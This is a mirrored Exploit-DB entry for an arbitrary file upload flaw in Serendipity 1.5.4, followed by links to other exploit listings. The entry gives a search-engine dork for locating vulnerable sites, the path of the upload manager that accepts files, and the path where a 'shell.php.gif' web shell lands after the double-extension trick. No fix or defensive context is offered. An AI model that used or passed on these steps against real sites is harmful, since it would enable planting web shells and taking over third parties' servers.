S9Y Serendipity 1.5.4 – Arbitrary File Upload

Exploit Database
12 阅读

作者： pentesters.ir

日期： 2010-12-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15795/

In The Name Of GOD 
[+] Exploit Title:remote 0day file upload
[+] Date: 2010
[+] script:Serendipity 1.5.4
[+] Software Link: http://www.s9y.org/12.html
[+] Author: pentesters.ir
[+]discovered by:ahmadbady
[+] Contact : kivi_hacker666@yahoo.com
[+] Website : WwW.PenTesters.IR 
[+] Greeting: Behzad, navid, ...
[+]dork:"Powered by s9y"and"Powered by serendipity"
----------------------------------------------------------------------------
up:
/path/htmlarea/plugins/ExtendedFileManager/manager.php

shell:
/htmlarea/plugins/ExtendedFileManager/demo_images/shell.php.gif
------------------------------------------------------------------------------

last Exploits
S9Y Serendipity 1.5.4 – Arbitrary File Upload的更多信息

Blog:CMS 4.2.1 e – Multiple HTML Injections / Cross-Site Scripting：
OpenEMR 5.0.1.3 – ‘manage_site_files’ Remote Code Execution (Authenticated) (2)：
WordPress Theme Magazine Basic – ‘id’ SQL Injection：
WordPress Plugin SP Project & Document Manager 4.21 – Remote Code Execution (RCE) (Authenticated)：
Websense Triton – Multiple Vulnerabilities：
ZeroClipboard 1.9.x – ‘id’ Cross-Site Scripting：
Support Incident Tracker 3.65 – ‘translate.php’ Remote Code Execution：
phpWebSite 1.7.1 – ‘mod.php’ SQL Injection：